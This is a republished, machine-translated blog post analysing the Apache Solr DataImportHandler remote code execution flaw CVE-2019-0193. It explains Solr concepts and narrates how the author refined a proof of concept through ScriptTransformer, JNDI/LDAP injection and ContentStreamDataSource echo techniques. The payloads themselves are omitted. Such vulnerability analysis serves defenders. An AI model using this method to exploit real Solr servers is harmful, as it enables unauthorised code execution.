How to analyze Apache Solr DataImportHandler remote Code execution vulnerability CVE-2019-0193 07/02 Update SLTechnology News&Howtos

How to analyze Apache Solr DataImportHandler remote Code execution vulnerability CVE-2019-0193

2025-07-02 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

How to carry out Apache Solr DataImportHandler remote code execution vulnerability CVE-2019-0193 analysis, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Overview of vulnerabilities

On August 01, 2019, Apache Solr issued an official warning that the Apache Solr DataImport function can receive the "dataConfig" parameter from the request when the Debug mode is enabled. The function of this parameter is the same as data-config.xml, but it is convenient to debug through this parameter when the Debug mode is enabled, and the Debug mode is enabled through the parameter. A malicious script script can be included in the dataConfig parameter to cause remote code execution.

I have carried on the emergency to this vulnerability, because the PoC constructed in the emergency is very chicken, needs to have the database driver, needs to connect to the database and has no echo, this kind of way is very difficult to use in the actual use. Later, a new PoC is gradually constructed, after several versions of PoC upgrade, to the end directly through the transmission of data flow, no database driver, no need to connect to the database and can be echoed. The following is a record of the process of PoC upgrade and some of the problems you have encountered. Thanks to @ Badcode and @ fnmsd for their help.

Test environment

The Solr-related environments involved in the analysis are as follows:

Solr-7.7.2

JDK 1.8.0_181

Related concepts

At first, I didn't look up the Solr-related information carefully, but I just flipped through the document to reproduce the loophole. At that time, I also thought that the data should be echoed, so I began to debug and try to construct the echo, but there was no harvest. Later, when I saw the new PoC, I felt that I went to debug blindly before I really understood the principle of this vulnerability, so I went back to consult Solr materials and documents, and sorted out some concepts related to the vulnerability below.

Solr working mechanism

1.solr is encapsulated on the basis of lucene toolkit and provides indexing functions in the form of web services.

two。 When a business system needs to use the function of indexing (indexing, indexing), it only needs to issue a http request and parse the returned data.

(1) creation of index data

Extract some data that can be searched according to the configuration file (encapsulated into a variety of Field), package each field into document, then analyze the document (participle of each field), get some index directories and write them to the index database, and document itself will also be written into a document information base.

(2) query of index data

According to the keyword parsing (queryParser), the query condition query (Termquery) is obtained, and the search tool (indexSearcher) is used to go to the index database to obtain the document id, and then go to the document information base according to the document id to obtain the document information.

Solr DataImportHandler

Solr DataImportHandler can import data into the index database in batches. According to the description in the Solr document, DataImportHandler has the following functions:

Read data or text data in a relational database

Read and index data from xml (http/file mode) according to configuration

Aggregate data from multiple columns and tables to build Solr documents based on configuration

Update Solr with documents (update indexes, document databases, etc.)

The ability to fully import according to configuration (full-import, full import creates the entire index each time it runs)

Detect insert / update fields and perform incremental imports (delta-import, import added or modified fields)

Scheduling full-import and delta-import

You can insert any type of data source (ftp,scp, etc.) and other user optional formats (JSON,csv, etc.)

Through the information searched and the description of DataImportHandler in the official documents, according to my understanding, the general flow chart of DataImport processing is as follows (only the main parts related to this vulnerability are drawn):

Several nouns explain:

Core: index library that contains schema.xml/managed-schema,schema.xml is the traditional name of the schema file and can be manually edited by users using the schema. Managed-schema is the name of the schema file used by Solr by default, which supports dynamic changes at run time, and the data-config file can be configured as xml or passed through the request parameter (through the dataConfig parameter when dataimport turns on debug mode)

Create a core from the command line

The-d parameter is the specified configuration template. Under solr 7.7.2, _ default and sample_techproducts_configs templates can be used.

Create a core from a web page

At first, I thought that the core could not be created from the web page. Although there is an Add Core, the core directory created by the click is empty and cannot be used, indicating that the configuration file cannot be found. The corresponding core must be created under the solr directory before it can be added in the web interface. Then try to use the absolute path configuration, which can also be seen in the web interface, but solr does not allow the use of configuration files other than the created core directory by default. If this switch is set to true, you can use the configuration files outside the corresponding core:

Later, when looking back, we found that core,configSet can also be created through the configSet parameter in the Solr Guide 7.5.It can be specified as _ default and sample_techproducts_configs. The following indicates that the creation is successful. However, the core created in this way does not have a conf directory, and its configuration is equivalent to linking to the configSet template rather than using the copy template:

Core can be created in both ways, but to use the dataimport feature, you still need to edit the configuration solrconfig.xml file, which can be better exploited if you can change the configuration file through web requests to configure the dataimport feature.

Schema.xml/managed-schema: this defines the fields associated with the data source (Field) and what to do with Field when Solr builds the index. You can open the schema.xml/managed-schema under the newly created core to view its content. If the content is too long, it will not be posted. Explain several elements related to this vulnerability:

Field: definition of the domain, equivalent to the field of the data source Name: name of the domain Type: type of the domain Indexed: whether to index Stored: whether to store multiValued: whether multi-value, if multi-value can hold multiple values in a domain example: dynamicField: dynamic domain The last stage of PoC is that the dynamic field definition echoed by this field allows the use of conventions over configuration. For fields, match the field name through the pattern specification example: name = "* _ I" will match any field ending with _ I in dataConfig (such as myid_i,z_i) restriction: glob-like patterns in the name attribute must have "*" only at the beginning or end. The implication here is that when dataConfig inserts data and discovers that a domain is not defined, you can use the dynamic domain as the field name for data storage, which will see example in the later evolution of PoC:

DataConfig: this configuration item can be passed through file configuration or by request (dataConfig parameter can be used when dataimport turns on Debug mode), how to get data (query statements, url, etc.), what kind of data to read (columns in relational database, or fields of xml), what to do (modify / add / delete), etc. Solr creates an index for these data and saves the data as Document

You need to know the following elements of dataConfig for this vulnerability: Transformer: each set of fields extracted by an entity can be used directly during the indexing process, can be used to modify fields or create an entirely new set of fields, or even return multiple rows of data. Transformer RegexTransformer must be configured at the entity level: using regular expressions to extract or manipulate values from fields (from sources) ScriptTransformer: you can write Transformer in Javascript or any other scripting language supported by Java The vulnerability uses this DateFormatTransformer: used to parse date / time strings into java.util.Date instances NumberFormatTransformer: can be used to parse numeric TemplateTransformer in String: can be used to overwrite or modify any existing Solr fields or to create new Solr fields HTMLStripTransformer: can be used to remove HTML ClobTransformer from string fields: can be used to create in the database Build String LogTransformer of Clob type: can be used to record data to console / log EntityProcessor: entity processor SqlEntityProcessor: when not specified Default processor XPathEntityProcessor: use FileListEntityProcessor when indexing XML type data: a simple entity processor An extended PlainTextEntityProcessor that can be used to enumerate the file list CachedSqlEntityProcessor:SqlEntityProcessor in the file system according to certain conditions: read everything in the data source into a single implicit field named "plainText". The content is not parsed in any way, but you can add transform as needed to manipulate the data LineEntityProcessor in "plainText": return a field named "rawLine" for each row read. The content will not be parsed in any way, but you can add transform to manipulate the data in "rawLine" or create other additional fields SolrEntityProcessor: import data from different Solr instances and cores dataSource: data source, which has the following types, each with its own different properties JdbcDataSource: database source URLDataSource: usually used with XPathEntityProcessor You can use file://, http://, ftp:// and other protocols to obtain the text data source HttpDataSource: same as URLDataSource, but with a different name FileDataSource: get the data source from the disk file FieldReaderDataSource: if the field contains xml information You can use this with XPathEntityProcessor to use ContentStreamDataSource: use post data as a data source, and you can use Entity: entities with any EntityProcessor, which is equivalent to encapsulating the data of the data source's operations into a Java object The field corresponds to the object property for the entity of the xml/http data source can have the following properties on top of the default attribute: processor (must): the value must be "XPathEntityProcessor" url (must): the URL used to invoke REST API. (can be templated). If the data source is a file, it must be the file location stream (optional): if the xml is very large, set this value to true forEach (must): the xpath expression that divides the record. If there are multiple types of records, they are separated by "|" (pipe). If useSolrAddSchema is set to 'true', it can be omitted. Xsl (optional): this will be used as a preprocessor for applying XSL transformations. Provide the full path in the file system or URL. UseSolrAddSchema (optional): if the xml entered into this processor has the same mode as solr add xml, set its value to "true". If set to true, there is no need to mention any fields. Flatten (optional): if set to true, all text under the label will be extracted into a field regardless of the label name. The field of the entity in a field can have the following attribute: xpath (optional): the xpath expression of the field to be mapped to the column in the record. If the column is not from the xml property (a composite field created by the converter), you can omit it. If the field is marked as multi-valued in the pattern and multiple values are found in the given row of xpath, it is automatically processed by XPathEntityProcessor. No additional configuration is required for commonField: it can be (true | false). If true, this field encountered in the record will be copied to other records before creating the Solr document. The first stage of PoC evolution PoC-database driver + external connection + no echo

According to the official vulnerability warning description, DataImportHandler can receive the parameter dataConfig when the Debug mode is enabled. The function of this parameter is the same as data-config.xml, but it is convenient to debug through this parameter when Debug mode is enabled, and the Debug mode is enabled through the parameter. The script script can be included in the dataConfig parameter, and an example of ScriptTransformer can be found in the document:

You can see that the java code can be executed in script, so the PoC is constructed (check the relevant error information through logs to check the problems in the PoC construction). The database can be connected externally, so the relevant information of the database can be controlled by itself, and it can be tested (only 127.0.0.1 used in the demonstration):

In the case of ScriptTransformer, you can see the word row.put, and guess it should be echoed. Test it:

You can only view the id field here, but you can't see it in the name field, and there is no error reported. Then you try to put the data into id:

You can see the echo message. At first, I didn't know why it was not possible to use put to name. Later, when I saw PoC in the third stage, I went back to check the data and realized that dataConfig and schema were used together. Because name field is not configured in schema, but id fileld is configured by default, solr will not put the name field data in Document and the id field is in it. In the third phase of PoC, the name attribute in each Field has "_ s". Then search and find that dynamicField can be configured in the schema configuration file. The following is the dynamicField configured by default:

This field is introduced in the related concepts above. You can check it up and test it. It is all right:

As long as dynamicField matches the name attribute of field in dataConfig, solr is automatically added to document. If schema is configured with the corresponding field, then the configured field takes precedence. If there is no configuration, the match is based on dynamicField.

The second stage of PoC-external connection + no echo

It is mentioned in the document that JdbcDataSource can use JNDI.

Test whether JNDI injection can be performed:

Here is a malicious demo for JNDI+LDAP. In this way, there is no need for the target CLASSPATH to be database driven.

The third stage of PoC-no external connection + echo

The PoC at this stage comes from @ fnmsd master and uses ContentStreamDataSource, but there is no description of how to use it in the documentation. Find an example of use in stackoverflower:

In the related concepts, it is said that ContentStreamDataSource can receive Post data as a data source, combined with the dynamicField mentioned in the first stage can achieve echo.

Only the effect image is demonstrated, and the specific PoC is not given:

Later, when you look back at other types of DataSource, you can also use URLDataSource/HttpDataSource, and an example is provided in the documentation:

Construction testing is also feasible, and protocols such as http and ftp can be used.

After reading the above, have you mastered how to analyze the Apache Solr DataImportHandler remote code execution vulnerability CVE-2019-0193? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.